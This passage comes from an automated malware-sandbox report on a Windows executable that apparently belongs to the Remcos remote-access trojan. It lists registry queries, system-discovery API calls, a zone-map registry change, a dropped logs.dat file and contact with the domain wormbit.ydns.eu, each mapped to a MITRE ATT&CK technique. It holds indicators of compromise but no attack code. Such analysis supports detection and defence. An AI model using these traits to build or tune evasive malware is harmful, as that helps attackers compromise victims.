\"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"json_1_.json\" has type \"JSON data\"- [targetUID: 00000000-00003236]\n \"logs.dat\" has type \"data\"- Location: [%ALLUSERSPROFILE%\\remcos\\logs.dat]- [targetUID: 00000000-00003236]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"FindResourceA\" with parameter \"4644252\" - (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4686168'}\" (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"OpenMutexA\" with parameter \"Rmcrfdcuvikuihbivuyrs-D47AW4-Sys\" - (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetLocaleInfoA\" with parameter \"2048\" - (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-189", "relevance": 5, "name": "Calls an APIs used to retrieve process information", "description": "Observed import api \"OpenProcessToken\" which can be \"used to retrieve process information\" [Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb]", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"IsWow64Process\" with parameter \"3236\" - (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f61802000000008e00000074f61802fefffffffcf51802cf000177d6000177529d21758e0000004700000074f6180200000000d0f518020000000038f61802 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000028000000008030692f00b4f418020464007738012800e06300771a9c2175000000000000280038692f006dd1b175357581686cae6575000000000000000008020000c4002800a82f28000100000000002800500128000c00000038692f00a82f2800020000001800000030000000ff07000000000000000000000300000054f41802ff07000000000000000000000b00000b7f070000c075b975a0f72b0000000000c075b97570f4180279dab17500000000a82f2800c8f41802dbd2b17538692f00c40028009d758168d6100000ff2b0077be9d21750000000004022800 (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000098e6280000006800be7439013ce42802ff2b007798e6280295e1fc76867a3900feffffff435c00775059007734020000400200008a056800880568001000000080000000ff2b00771a8d117520a3736eac012800000028001d006b0006000000ff2b00777e8d117500d15473ac0128001e00660006000000060000000000680000006800bcee0077d86f28001f00610020000000b4e528020000000040cd2c00c86c2800e86d2800580a3000907128000000680030e5280240cd2c00b0e6280295e1fc76be743900feffffffff2b00779a2a007720a3736e10a3736e00000000 (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetForegroundWindow\" (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetWindowTextW\" (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"GetWindowTextW\" with parameter \"Task Switching\" - (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-199", "type": 6, "relevance": 1, "name": "Calls an API used to connect to internet", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"InternetOpenA\" (UID: 00000000-00003236)\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"InternetOpenW\" (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /json.gp\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-118", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the URL data", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" called \"InternetReadFile\" with parameter 65535 (UID: 00000000-00003236)", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-81", "type": 7, "relevance": 5, "name": "High entropy domain detected", "description": "Contacted domain: \"wormbit.ydns.eu\" has high entropy", "origin": "Network Traffic", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"netCache\" in header \"GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-193", "relevance": 5, "name": "Calls an API used to change the configuration parameters of a service", "description": "Observed import api \"ChangeServiceConfig\" which can be \"used to change the configuration parameters of a service\" [Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "static-92", "relevance": 5, "name": "PE file has unusual entropy resources", "description": "\"6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb\" has resource with unusual entropy \"RT_RCDATA:7.85890775473722\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"SleepConditionVariableCS\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"FlsAlloc\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"FlsFree\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"FlsGetValue\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"FlsSetValue\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"InitializeCriticalSectionEx\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNELBASE.DLL)\n Found string \"InitOnceExecuteOnce\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: KERNEL32.DLL)\n Found string \"CreateEventExW\" (Source: 6fcbf672e0e5a4d3c3bcc34d4bad46f94c11fb29fbca5e1b23ce764da45ba8fb, API is part of module: 